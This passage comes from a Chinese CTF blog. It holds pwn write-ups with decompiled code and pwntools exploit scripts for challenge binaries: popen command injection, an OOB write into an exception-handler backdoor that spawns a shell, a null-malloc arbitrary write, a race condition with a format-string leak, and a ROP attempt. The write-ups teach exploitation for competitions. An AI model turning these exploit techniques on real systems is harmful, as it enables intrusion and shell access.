    result = 0;
  }
  else if ( strchr(haystack, '{') )
  {
    result = 0;
  }
  else if ( strchr(haystack, '}') )
  {
    result = 0;
  }
  else if ( strchr(haystack, '`') )
  {
    result = 0;
  }
  else if ( strstr(haystack, needle) )
  {
    result = 0;
  }
  else
  {
    result = strstr(haystack, bin) == 0;
  }
  if ( v4 != __readgsdword(0x14u) )
    sub_2A70();
  return result;
}

如果这些检测都没问题，就把 stdout 和 stderr 重定向到了 /dev/null，相当于关闭了这两个输出。虽然不理解为什么要这么做，但是结合后面的代码，思考了一下感觉可能是为了隐藏 popen 的输出？总之做完后的评价就是：迷惑行为。

然后是利用点，我们看到 stream = popen(haystack, modes)，简单来说就是 popen 会将 haystack 作为 shell 指令，创建一个子进程去执行它。那不就是任意代码执行吗？不过 check 函数已经过滤了 /bin/sh，我们不能直接返回 shell，只能用规则内的字符去构造指令。

继续往下看，整个 if ( stream ) 里面的代码除了恢复了 stdout 和 stderr 外，基本上都没啥用。无非就是判断文件是否存在，逐一列出目录下的文件之类的……属于是一大坨障眼法。虽然现在说的轻松，但是实际上做题的时候可没这么想，做的时候老仔细了，所以也老容易掉到坑里哈哈哈。问题不大，如何快速定位漏洞，快速逆向分析一个程序的经验不就是这样慢慢积累起来的吗？做完题总会有不少感触，而这些感触慢慢地就会变成你的实力。

有一个很重要的点是，在 popen 之前，haystack = &path[1]，跳过了第一个字符 /，直接从第二个字符开始，所以我们完全不用担心指令以 / 开头导致什么都做不了。

没完呢，继续往下看，我们发现，如果进入了 stat(haystack, &buf) < 0 的话，那后面的 (buf.st_mode & 0xF000) == 0x4000 肯定就进不去了，直接跳到末尾，执行 stream_1 = fopen(haystack, "r")，输出打开的文件的信息，并且进入 while 循环逐字节输出文件内容。

至此，整个程序的逻辑就已经摸的差不多了。因为我们可以直接读取文件内容，那为何不直接将 flag 复制到当前目录下，然后再发送读取的请求，让它输出 flag 呢？

唯一值得注意的是，我们使用 cp 指令将 flag 复制过来，指令之中必定会包含空格。由于这个程序是按标准的 HTTP 协议实现的 tiny server，我们直接查一下空格在 URL 中的转义字符，知道是 %20，如果是实现了自定义协议，那我们就得深入逆向它的子函数了……想想都觉得麻烦……

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    flat,
    process,
    remote,
)


FILE = "./httpd"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    payload = flat(
        b"GET /cp%20/flag%20. HTTP/1.0\n",
        b"Host: 127.0.0.1\n",
        b"Content-Length: 0\n",
    )
    target.send(payload)
    target.recvall()
    target.close()

    launch()
    payload = flat(
        b"GET /flag HTTP/1.0\n",
        b"Host: 127.0.0.1\n",
        b"Content-Length: 0\n",
    )
    target.send(payload)

    target.interactive()


if __name__ == "__main__":
    main()

logger

Information

Category: Pwn
Points: Unknown

Description

Unknown

Write-up

先看下面的 trace 功能：

unsigned __int64 trace()
{
  int i; // [rsp+Ch] [rbp-24h]
  int j; // [rsp+Ch] [rbp-24h]
  int n8; // [rsp+10h] [rbp-20h]
  __int16 choice; // [rsp+26h] [rbp-Ah] BYREF
  unsigned __int64 v5; // [rsp+28h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  printf("\nYou can record log details here: ");
  fflush(stdout);
  for ( i = 0; i <= 8 && byte_404020[16 * i]; ++i )
    ;
  if ( i <= 8 )
  {
    byte_404020[16 * i + read(0, &byte_404020[16 * i], 0x10u)] = 0;
    printf("Do you need to check the records? ");
    fflush(stdout);
    choice = 0;
    __isoc99_scanf("%1s", &choice);
    if ( (_BYTE)choice == 'y' || (_BYTE)choice == 'Y' )
    {
      n8 = 8;
      for ( j = 0; j <= 8 && byte_404020[16 * j] && n8; ++j )
      {
        printf("\x1B[31mRecord%d. %.16s\x1B[0m", j + 1, &byte_404020[16 * j]);
        --n8;
      }
    }
    else if ( (_BYTE)choice != 'n' && (_BYTE)choice != 'N' )
    {
      puts("Invalid input. Please enter 'y' or 'n'.");
      exit(0);
    }
  }
  else
  {
    puts("Records have been filled :(");
  }
  return v5 - __readfsqword(0x28u);
}

12 行的 for 循环用来计算索引，按 16 字节访问 byte_404020，只要 i <= 8 && byte_404020[16 * i] 就增加 i 的值。感觉 i <= 8 有点奇怪，不管如何，先计算一下这个函数可以返回多大的索引呢？应该是 9。

.data:0000000000404020 ; char byte_404020[128]
.data:0000000000404020 byte_404020     db 0, 0Ah, 7Eh dup(0)   ; DATA XREF: trace+58↑o
.data:0000000000404020                                         ; trace+9F↑o ...
.data:00000000004040A0 ; char src[]
.data:00000000004040A0 src             db 'Buffer Overflow',0  ; DATA XREF: warn+F0↑o
.data:00000000004040A0                                         ; warn+165↑o

可是查看 byte_404020 发现，人家按 16 字节访问的话最多只能访问 8 个元素，那我们访问第九个元素就会得到 src 的内容。存在一个 OOB。

如果 i <= 8 的话，进入 if，紧接着 byte_404020[16 * i + read(0, &byte_404020[16 * i], 0x10u)] = 0 以前面得到的索引乘以十六加上基地址，定位到下一项，加上 read 读取到的字节数，并将那个位置的值置零，相当于就是手动设置 NULL 的一体版本。与此同时，read 写入的是下一项。

我们可以先研究研究怎么控制 src 的内容。已知前八项应该是可以合法写入的，那我们先写 8 项，然后如何写入第九项呢？虽然我是调试出来的，但是也可以直接分析代码。由于计算索引使用的条件是 i <= 8 && byte_404020[16 * i]，然后才会增加索引值。注意到后半部分，判断 byte_404020[16 * i] 处的单个字节是否不为 0，如果这个字节为 0 的话，这个判断就会失败，索引值不会被增加。

如果第八项数据我们写满 16 字节，那它就会把第九项数据处的第一个字节设置为 NULL，那么此时我们再次使用 trace 输入第九项数据，它会先依次遍历每一个已写入的元素，得到索引 7，然后发现 byte_404020[16 * i] 为 0，故将索引加一变成 8。此时我们就控制了第九项的值。

~天，为啥写个 OOB 分析写那么详细……好像很多佬的博客都写的很简略的……我可真是大好人啊（bushi~

嗯……那么第一部分分析就到此结束了。然后看 warn 功能：

unsigned __int64 warn()
{
  unsigned __int64 len; // rax
  _QWORD *exception; // rax
  __int64 v3; // [rsp+8h] [rbp-78h]
  char buf[16]; // [rsp+10h] [rbp-70h] BYREF
  char date[8]; // [rsp+20h] [rbp-60h] BYREF
  __int64 v6; // [rsp+28h] [rbp-58h]
  __int64 v7; // [rsp+30h] [rbp-50h]
  __int64 v8; // [rsp+38h] [rbp-48h]
  char date_1[8]; // [rsp+40h] [rbp-40h] BYREF
  __int64 v10; // [rsp+48h] [rbp-38h]
  __int64 v11; // [rsp+50h] [rbp-30h]
  __int64 v12; // [rsp+58h] [rbp-28h]
  unsigned __int64 v13; // [rsp+68h] [rbp-18h]

  v13 = __readfsqword(0x28u);
  memset_w(buf);
  *(_QWORD *)date = 0;
  v6 = 0;
  v7 = 0;
  v8 = 0;
  set_time(date, 0x20u);
  printf("\n\x1B[1;31m%s\x1B[0m\n", date);
  printf("[!] Type your message here plz: ");
  fflush(stdout);
  len = read(0, buf, 256u);                     // buffer overflow
  HIBYTE(v3) = HIBYTE(len);
  buf[len - 1] = 0;
  if ( len > 0x10 )
  {
    memcpy(dest_0, buf, sizeof(dest_0));
    strcpy(dest, src);                          // "Buffer Overflow"
    strcpy(&dest[strlen(dest)], ": ");
    strncat(dest, dest_0, 0x100u);
    puts(dest);
    exception = __cxa_allocate_exception(8u);
    *exception = src;                           // "Buffer Overflow"
    __cxa_throw(exception, (struct type_info *)&`typeinfo for'char *, 0);
  }
  memcpy(dest_1, buf, sizeof(dest_1));
  *(_QWORD *)date_1 = 0;
  v10 = 0;
  v11 = 0;
  v12 = 0;
  set_time(date_1, 0x20u);
  printf("[User input log]\nMessage: %s\nDone at %s\n", dest_1, date_1);
  sub_401CCA(buf);
  return v13 - __readfsqword(0x28u);
}

注意到这里将读取 256 字节数据，然后根据 read 的返回值是否大于 16 判断是否发生了溢出。忽略中间代码，直接看异常处理部分。根据前面的分析，我们知道 src 保存的就是第九项的数据，而这一项我们已经可以控制为任意值。如果 warn 检测到 BOF，就会 throw src，类型为 char const*。但是我们注意到 IDA 对 try catch 的反编译支持好像有些问题，我们看不到 try，可看不到 catch，只能看到它抛出异常。因此这里我们需要切换到汇编视图去查看 catch 的逻辑。

其实发现反汇编试图是可以看见 try catch 的，由于程序有好几处 try catch 逻辑，下面我只贴出需要重点关注的地方：

~虽然感觉 IDA 的 graph view 很帅，但还是让我们看 text view 吧（~

.text:0000000000401B8F     ; =============== S U B R O U T I N E =======================================
.text:0000000000401B8F
.text:0000000000401B8F     ; Attributes: bp-based frame
.text:0000000000401B8F
.text:0000000000401B8F     ; void __noreturn sub_401B8F()
.text:0000000000401B8F     sub_401B8F      proc near
.text:0000000000401B8F
.text:0000000000401B8F     command         = qword ptr -18h
.text:0000000000401B8F     var_8           = qword ptr -8
.text:0000000000401B8F
.text:0000000000401B8F     ; __unwind { // __gxx_personality_v0
.text:0000000000401B8F 000                 endbr64
.text:0000000000401B93 000                 push    rbp
.text:0000000000401B94 008                 mov     rbp, rsp
.text:0000000000401B97 008                 push    rbx
.text:0000000000401B98 010                 sub     rsp, 18h
.text:0000000000401B9C 028                 mov     edi, 8          ; thrown_size
.text:0000000000401BA1 028                 call    ___cxa_allocate_exception
.text:0000000000401BA6 028                 lea     rdx, aEchoHelloYcbCt ; "echo Hello, YCB ctfer!"
.text:0000000000401BAD 028                 mov     [rax], rdx
.text:0000000000401BB0 028                 mov     edx, 0          ; void (*)(void *)
.text:0000000000401BB5 028                 mov     rcx, cs:_ZTIPKc_ptr
.text:0000000000401BBC 028                 mov     rsi, rcx        ; lptinfo
.text:0000000000401BBF 028                 mov     rdi, rax        ; exception
.text:0000000000401BC2     ;   try {
.text:0000000000401BC2 028                 call    ___cxa_throw
.text:0000000000401BC2     ;   } // starts at 401BC2
.text:0000000000401BC7     ; ---------------------------------------------------------------------------
.text:0000000000401BC7     ;   catch(char const*) // owned by 401BC2
.text:0000000000401BC7 028                 endbr64
.text:0000000000401BCB 028                 cmp     rdx, 1
.text:0000000000401BCF 028                 jz      short loc_401BD9
.text:0000000000401BD1 028                 mov     rdi, rax        ; struct _Unwind_Exception *
.text:0000000000401BD4 028                 call    __Unwind_Resume
.text:0000000000401BD9     ; ---------------------------------------------------------------------------
.text:0000000000401BD9
.text:0000000000401BD9     loc_401BD9:                             ; CODE XREF: sub_401B8F+40↑j
.text:0000000000401BD9 028                 mov     rdi, rax        ; void *
.text:0000000000401BDC 028                 call    ___cxa_begin_catch
.text:0000000000401BE1 028                 mov     [rbp+command], rax
.text:0000000000401BE5 028                 mov     rax, [rbp+command]
.text:0000000000401BE9 028                 mov     rsi, rax
.text:0000000000401BEC 028                 lea     rax, aAnExceptionOfT_1 ; "[-] An exception of type String was cau"...
.text:0000000000401BF3 028                 mov     rdi, rax        ; format
.text:0000000000401BF6 028                 mov     eax, 0
.text:0000000000401BFB     ;   try {
.text:0000000000401BFB 028                 call    _printf
.text:0000000000401C00 028                 mov     rax, [rbp+command]
.text:0000000000401C04 028                 mov     rdi, rax        ; command
.text:0000000000401C07 028                 call    _system
.text:0000000000401C07     ;   } // starts at 401BFB
.text:0000000000401C0C 028                 nop
.text:0000000000401C0D 028                 call    ___cxa_end_catch
.text:0000000000401C12 028                 jmp     short loc_401C2B
.text:0000000000401C14     ; ---------------------------------------------------------------------------
.text:0000000000401C14     ;   cleanup() // owned by 401BFB
.text:0000000000401C14 000                 endbr64
.text:0000000000401C18 000                 mov     rbx, rax
.text:0000000000401C1B 000                 call    ___cxa_end_catch
.text:0000000000401C20 000                 mov     rax, rbx
.text:0000000000401C23 000                 mov     rdi, rax        ; struct _Unwind_Exception *
.text:0000000000401C26 000                 call    __Unwind_Resume
.text:0000000000401C2B     ; ---------------------------------------------------------------------------
.text:0000000000401C2B
.text:0000000000401C2B     loc_401C2B:                             ; CODE XREF: sub_401B8F+83↑j
.text:0000000000401C2B 028                 mov     rbx, [rbp+var_8]
.text:0000000000401C2F 028                 leave
.text:0000000000401C30 000                 retn
.text:0000000000401C30     ; } // starts at 401B8F
.text:0000000000401C30     sub_401B8F      endp

我们注意到上面这个 sub_401B8F 函数的 catch 逻辑中有隐藏后门，它将 rbp+command 处的值作为 rdi，调用 system。如果我们控制这个值为 /bin/sh 的话，我们就可以 get shell。于此同时，最重要的是，这个后门 catch handler 是属于 catch(char const*) 的，和我们抛出的 src 类型一样，所以如果我们返回到这个 handler，是可以执行的。

经过调试发现，这个 rbp+command 其实就是第九项的内容，那么我们只要将第九项修改为 /bin/sh，然后返回到含有后门的 catch handler 起始地址即可。由于没开 PIE，所以可以直接通过 IDA 确定地址。为了方便查看，catch handler 的地址我在上面用绿色标记了，免得大家不知道 exp 中的魔数是哪里来的。

最后，这是我第一次学习 C 艹异常处理 pwn，写的也不是很详细。后续我会单独写一篇，也可能是几篇博客从头再梳理一下这方面的利用思路。这几天就会开工，到时候加入到 Beyond Basics: The Dark Arts of Binary Exploitation 里，从此我收录的技巧也开始变得高级起来～

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "./patched"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def trace(log_details, check):
    target.sendlineafter(b"Your chocie:", b"1")
    target.sendlineafter(b"You can record log details here: ", log_details)
    target.sendlineafter(b"Do you need to check the records? ", check)


def warn(msg):
    target.sendlineafter(b"Your chocie:", b"2")
    target.sendlineafter(b"[!] Type your message here plz: ", msg)


def exit():
    target.sendlineafter(b"Your chocie:", b"3")


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    trace(b"A" * 0x8, b"y")
    trace(b"A" * 0x8, b"y")
    trace(b"A" * 0x8, b"y")
    trace(b"A" * 0x8, b"y")
    trace(b"A" * 0x8, b"y")
    trace(b"A" * 0x8, b"y")
    trace(b"A" * 0x8, b"y")
    raw_input("DEBUG")
    trace(b"A" * 0x10, b"y")
    trace(b"/bin/sh\x00", b"y")

    payload = flat(
        b"A" * 0x70,
        elf.bss(),
        0x401BC7,
    )
    warn(payload)

    target.interactive()


if __name__ == "__main__":
    main()

Write-ups: 2025 年江苏省第七届大学生网络空间安全知识技能大赛预赛

Sun, 21 Sep 2025 00:00:00 GMT

打个酱油辅助一下……难以想象整个比赛就这一道 Pwn，也是体验了一波 AK 完睡觉的感觉……

Pwn

Description

Category: Pwn

Write-ups

保护全开，不过就一个很小的 main 函数：

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  _QWORD *ptr; // rbx
  char *buf; // rbp
  size_t write_size; // rdx
  size_t size[5]; // [rsp+0h] [rbp-28h] BYREF

  size[1] = __readfsqword(0x28u);
  setup();
  puts("Welcome.");
  ptr = malloc(0x40000u);
  *ptr = 1;
  _printf_chk(1, "Leak: %p\n");
  _printf_chk(1, "Length of your message: ");
  size[0] = 0;
  _isoc99_scanf("%lu", size);
  buf = (char *)malloc(size[0]);
  _printf_chk(1, "Enter your message: ");
  read(0, buf, size[0]);
  write_size = size[0];
  buf[size[0] - 1] = 0;
  write(1, buf, write_size);
  if ( !*ptr )
    system("cat /flag");
  return 0;
}

一开始想的是堆溢出，后来调试了一下发现是不可能的（当时还因为没有 libc，手动 patch 出毛病，pwndbg 检查不了 heap 等一系列问题浪费了将近一小时……），然后想着有没有可能改 read 的 size、是不是和整数溢出有关……结果就是，都错了。

不过在思考整数溢出的时候，倒是给了我一些灵感。一开始也不知道如果和整数溢出有关的话应该做点啥，就直接输入经典的 -1 调试了一下，发现 malloc 因为请求值太大而失败了，于是乎，就有了下面的解决方案：

程序首先 malloc 返回一个地址，然后将其启始处的值设为 1。之后 if 判断这个值是否为 0, 为 0 就 cat flag 。所以目标自然是将这个值清零。

如果我们给 malloc 传入一个巨大的 size，malloc 会直接失败，返回 0，这样一来 buf 就变成了 NULL 。接着下面的 read 就会向空指针处写入值，也必然失败。由于程序没有检查 malloc 和 read 的返回值，所以会无视错误继续运行。接下来 buf[size[0] - 1] = 0 就相当于 ((char *)NULL)[size[0] - 1] = 0，也就是 *(size[0] - 1) = 0。

由于 size[0] 是我们输入的 size，那我们就获得了一个任意地址写。令 size 为泄漏出来的地址加一，它就会将泄漏出来的地址处的值清空，成功绕过 if 检测。

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    process,
    raw_input,
    remote,
)


FILE = "./patched"
HOST, PORT = "new.mhxaskills.cn", 33662

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    target.recvuntil(b"Leak: ")
    leak = int(target.recvline().strip(), 16)

    # raw_input("DEBUG")
    target.sendlineafter(b"Length of your message: ", str(leak + 1).encode())
    target.sendlineafter(b"Enter your message: ", b"A")

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[flag{15655165-6d36-e11d-4e83-5f14cb5d1da5}]

Write-ups: NepCTF 2025

Sat, 20 Sep 2025 00:00:00 GMT

Time

Information

Category: Pwn
Points: Unknown

Description

Unknown

Write-up

当时直接被别的 pwn 题吓跑了，感觉一道也做不出来……今天来复现一下这道 race condition 的题。没看 wp 自己做出来了，草啊，为啥当时不去试试别的题呢？

其实我没学过 race condition，但是因为看过 CSAPP，所以也知道个大概 ba，下面写一下思路。

void __fastcall __noreturn main(int a1, char **a2, char **a3)
{
  pthread_t newthread[2]; // [rsp+0h] [rbp-10h] BYREF

  newthread[1] = __readfsqword(0x28u);
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  get_name();
  while ( 1 )
  {
    while ( !(unsigned int)get_filename() )
      ;
    pthread_create(newthread, 0, (void *(*)(void *))start_routine, 0);
  }
}

首先是这个 get_name 函数，里面先获取了用户名，保存到 bss 中的 format_0。然后 fork 出来一个子进程，执行 /bin/ls / -al，并在回收子进程后返回到 main 。

unsigned __int64 get_name()
{
  char *argv[5]; // [rsp+10h] [rbp-30h] BYREF
  unsigned __int64 v2; // [rsp+38h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  puts("please input your name:");
  __isoc99_scanf("%100s", format_0);
  puts("I will tell you all file names in the current directory!");
  argv[0] = "/bin/ls";
  argv[1] = "/";
  argv[2] = "-al";
  argv[3] = 0;
  if ( !fork() )
    execve("/bin/ls", argv, 0);
  wait(0);
  puts("good luck :-)");
  return v2 - __readfsqword(0x28u);
}

返回后进入 main 中的无限循环，先调用了 get_filename 函数，读取到的文件名保存在 bss 中的 file 这个位置，然后判断输入的文件名是否为 flag，如果是 flag 就返回 0，接着返回到 main 重新运行这个函数。所以为了让它继续往下执行，我们这里不能直接输入 flag 。

__int64 get_filename()
{
  puts("input file name you want to read:");
  __isoc99_scanf("%s", file);
  if ( !strstr(file, "flag") )
    return 1;
  puts("flag is not allowed!");
  return 0;
}

往下看，有个创建子线程的 pthread_create 调用，它会创建一个子线程执行 start_routine。根据运行测试 plus 逻辑分析，我们知道这个函数中调用的其它不知名功能应该就是用来计算 md5 的。细节我们不去管它，直接看宏观逻辑的话，应该是计算好 md5 后逐字节输出，然后清空 buf 用于保存后面 open 打开的文件的内容。之后有个格式化字符串漏洞，使用的格式化字符串是我们一开始在 get_name 中输入的内容。

unsigned __int64 __fastcall start_routine(void *a1)
{
  unsigned int n; // eax
  int i; // [rsp+4h] [rbp-46Ch]
  int j; // [rsp+8h] [rbp-468h]
  int fd; // [rsp+Ch] [rbp-464h]
  _DWORD v6[24]; // [rsp+10h] [rbp-460h] BYREF
  _BYTE v7[16]; // [rsp+70h] [rbp-400h] BYREF
  _BYTE buf[1000]; // [rsp+80h] [rbp-3F0h] BYREF
  unsigned __int64 v9; // [rsp+468h] [rbp-8h]

  v9 = __readfsqword(0x28u);
  sub_1329(v6);
  n = strlen(file);
  sub_1379(v6, file, n);
  sub_14CB(v6, (__int64)v7);
  puts("I will tell you last file name content in md5:");
  for ( i = 0; i <= 15; ++i )
    printf("%02X", (unsigned __int8)v7[i]);
  putchar(0xA);
  for ( j = 0; j <= 999; ++j )
    buf[j] = 0;
  fd = open(file, 0);
  if ( fd >= 0 )
  {
    read(fd, buf, 0x3E8u);
    close(fd);
    printf("hello ");
    printf(format_0);
    puts(" ,your file read done!");
  }
  else
  {
    puts("file not found!");
  }
  return v9 - __readfsqword(0x28u);
}

这题的思路就是，首先让它获取一个非 flag 的文件名，如此我们才能够创建子线程调用 start_routine。而解题的关键在于这里执行子进程和执行父进程之间存在一个 race condition 。

由于程序是并发执行的，运行一段时间主线程就会运行一段时间子线程，而主线程和子线程到底是哪个先运行，这是无法预测的。可能先跑子线程，跑完跑主线程，也可能先跑主线程，然后跑子线程……假设我们就是先跑了主线程，那我们就又回到了 get_filename，我们就可以输入 flag，覆盖原先为了创建子线程而使用的其它文件名，而由于输入是直接用 scanf 写到 bss 的，所以后面那个检测是不是 flag 的判断我们可以直接忽视。这样一来，我们再去执行子线程的时候 open 打开的就是 flag 了。

那我们怎么知道它一定会先跑一会儿主线程呢？这涉及了一些更底层的知识，我个人的理解是，由于现代计算机中的程序都是并发运行的，而每个线程都有一个固定的很短的执行周期，一旦这个执行周期耗尽，就会切换到另一个进程去执行，然后切换回来，继续执行刚才被切走的线程，如此反复……由于子线程中计算 md5 的时候调用的函数会占用大量的时钟周期，所以说如果我们现在在执行子线程，那在需要如此多时钟周期 + 如此短的并发周期内，它肯定不可能完成子线程的执行，也就是说必然会中途暂停了去执行主线程。那自然就可以推导出我们必然可以覆盖文件名的内容，让子线程打开我们想要打开的文件……

OK，现在我们知道怎么把 flag 读到内存中了，结合后面那个格式化字符串漏洞，我们就可以泄漏出内存中的 flag，非常简单。没想到我的第一道 race condition challenge 就这样挑战成功了。

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "./patched"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    payload = flat(
        b"%22$p-%23$p",
    )
    raw_input("DEBUG")
    target.sendlineafter(b"name:", payload)
    target.sendline(b"aaaa")
    target.sendline(b"flag")
    target.recvuntil(b"hello ")

    resp = target.recvuntil(b" ,").split(b"-")
    flag_p1 = bytes.fromhex(resp[0].decode()[2:])[::-1].decode()
    flag_p2 = bytes.fromhex("0" + resp[1].decode()[2:-2])[::-1].decode()
    flag = flag_p1 + flag_p2
    target.success(flag)

    target.interactive()


if __name__ == "__main__":
    main()

Write-ups: idekCTF 2025

Fri, 19 Sep 2025 00:00:00 GMT

Little ROP

Information

Category: Pwn
Points: 362

Description

No PIE, no canary. Perfect setup for ROP. Show me what you can do!

Write-up 1

840+ 支队伍，结果这题只有 27 个解，说实话一开始以为是签到题，结果没想到那么难……总之这题质量还是不错的，后期一定要回头深挖一下……

这题解法还挺多的，据我所知就有三种方法，我这里依次记录，就叫 Write-ups 1, 2, 3 吧，学习一下。

首先这个方法 1，也是我当时想到的方法，就是覆盖 setbuf 的 got 表为 one_gadget 的地址。但是后来发现找不到合适的 one_gadget……

这里记录的是和这个方法差不多的变体，注意到下面这个函数里面分别调用了三次 setbuf，用到了两个参数，其中 stdin, stdout, stderr 都位于 bss 段，作为 rdi 的参数。

void __fastcall setup(int argc, const char **argv, const char **envp)
{
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
}

这就给了我们一个控制 rdi 的 gadget，我们可以把 /bin/sh 写在已知的地址，选一个 rdi gadget 用于设置 rdi 。

; Attributes: bp-based frame

; void __fastcall setup(int argc, const char **argv, const char **envp)
public setup
setup proc near
; __unwind {
endbr64
push    rbp
mov     rbp, rsp
mov     rax, cs:stdin@GLIBC_2_2_5
mov     esi, 0          ; buf
mov     rdi, rax        ; stream
call    _setbuf
mov     rax, cs:stdout@GLIBC_2_2_5
mov     esi, 0          ; buf
mov     rdi, rax        ; stream
call    _setbuf
mov     rax, cs:stderr@GLIBC_2_2_5
mov     esi, 0          ; buf
mov     rdi, rax        ; stream
call    _setbuf
nop
pop     rbp
retn
; } // starts at 401156
setup endp

之后我们 partial overwrite setbuf 的低三字节为 system 的偏移，就有 $1/16$ 的概率命中 system 。

但是实际调试的时候发现在进入 do_system 后的栈操作会将我们本就不高的栈地址一直缩小，最后 RSP 变成了只读地址，然后向只读地址之写入数据，导致访问不可写地址而 abort 。

Program received signal SIGSEGV, Segmentation fault.
0x00007fee1bf5b93e in do_system (line=0x404010 "") at ../sysdeps/posix/system.c:102
102 in ../sysdeps/posix/system.c
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────
 RAX  0xcdd2ecfdc1a6800
 RBX  0x404010 (_GLOBAL_OFFSET_TABLE_+16) ◂— 0
 RCX  0x7fee1c01f7e2 (read+18) ◂— cmp rax, -0x1000 /* 'H=' */
 RDX  1
 RDI  0x404010 (_GLOBAL_OFFSET_TABLE_+16) ◂— 0
 RSI  0
 R8   0x7fee1c126f10 (initial+16) ◂— 4
 R9   0x7fee1c147040 (_dl_fini) ◂— endbr64
 R10  0x7fee1bf115e8 ◂— 0xf001200001a64
 R11  0x246
 R12  0x7fff1d8a7218 —▸ 0x7fff1d8a7edb ◂— '/home/user/chall'
 R13  0x7fee1c1277a0 (quit) ◂— 0
 R14  0x7fee1c127840 (intr) ◂— 0
 R15  0x7fee1c17b040 (_rtld_global) —▸ 0x7fee1c17c2e0 ◂— 0
 RBP  0
 RSP  0x403c80 ◂— 0
 RIP  0x7fee1bf5b93e (do_system+62) ◂— mov qword ptr [rsp + 0x378], rax
────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────
   0x7fee1bf5b926 <do_system+38>     punpcklqdq xmm1, xmm2
   0x7fee1bf5b92a <do_system+42>     push   rbx
   0x7fee1bf5b92b <do_system+43>     mov    rbx, rdi
   0x7fee1bf5b92e <do_system+46>     sub    rsp, 0x388
   0x7fee1bf5b935 <do_system+53>     mov    rax, qword ptr fs:[0x28]               RAX, [0x7fee1bf08768]
 ► 0x7fee1bf5b93e <do_system+62>     mov    qword ptr [rsp + 0x378], rax           [0x403ff8] <= 0xcdd2ecfdc1a6800
   0x7fee1bf5b946 <do_system+70>     xor    eax, eax                               EAX => 0
   0x7fee1bf5b948 <do_system+72>     mov    dword ptr [rsp + 0x18], 0xffffffff     [0x403c98] <= 0xffffffff
   0x7fee1bf5b950 <do_system+80>     mov    qword ptr [rsp + 0x180], 1             [0x403e00] <= 1
   0x7fee1bf5b95c <do_system+92>     mov    dword ptr [rsp + 0x208], 0             [_DYNAMIC+104] <= 0
   0x7fee1bf5b967 <do_system+103>    mov    qword ptr [rsp + 0x188], 0             [0x403e08] <= 0
─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x403c80 ◂— 0
... ↓        7 skipped
───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────
 ► 0   0x7fee1bf5b93e do_system+62
   1         0x401186 setup+48
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> vmmap 0x403c80+0x378
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
             Start                End Perm     Size Offset File (set vmmap-prefer-relpaths on)
          0x402000           0x403000 r--p     1000   4000 chall_patched
►         0x403000           0x404000 r--p     1000   4000 chall_patched +0xff8
          0x404000           0x405000 rw-p     1000   5000 chall_patched

解决方法是在覆盖 setbuf 之后那个 read 执行完栈迁移后再想办法给它迁移到更高的地址去，但是覆盖 setbuf 后继续写 rop 的话会破坏 setbuf 的高位地址……不知道是不是 skill 问题，反正就是有问题……

所以我还有一个想法就是，或许第一次 setbuf 先覆盖为 puts 的地址，泄漏 got 中的 libc，然后再用原先的方式控制 rdi，执行 system 。太懒了，下次再研究……

虽然我测试是失败了，无论是本地还是远程调试 docker 内的 chall，但比赛当天有人用同样的思路，打通了……很奇怪，感觉不可思议……

Exploit 1

#!/usr/bin/env python3

from pwn import (
    ELF,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)

FILE = "./chall"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = ELF("./libc.so.6")


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    read = 0x4011A9
    leave_ret = 0x4011C0
    ret = 0x4011C1
    control_rdi = 0x401186
    store_binsh = 0x404080
    binsh = 0x404068
    system = libc.sym["system"]

    target.success(f"system: {hex(system)}")
    target.success(f"setbuf@got: {hex(elf.got['setbuf'])}")

    payload = flat(
        b"A" * 32,
        store_binsh,  # first_read rbp (store /bin/sh in `store_binsh - 0x20`)
        read,
        binsh,
        b"/bin/sh\x00",
        b"B" * 0x10,
        store_binsh - 0x30,  # rbp (for more ROP) 0x404040
        read,
        b"C" * 0x10,
        control_rdi,
        b"D" * 0x8,
        elf.got["setbuf"] + 0x20,  # rbp
        read,  # after this, pivot to higher stack...? seems impossible !
        b"\x70\x0d\x05",  # system
    )
    raw_input("DEBUG")
    target.send(payload)

    target.interactive()


if __name__ == "__main__":
    main()

Write-up 2

据说预期解是 ret2lresolve，崩溃，留作 TODO，有空再研究。

Exploit 2

TODO

Write-up 3

还有一个解是使用 add dword ptr [rbp - 0x3d], ebx; nop; ret gadget，后面有空再研究，崩溃的我现在只想躺床上睡一天……

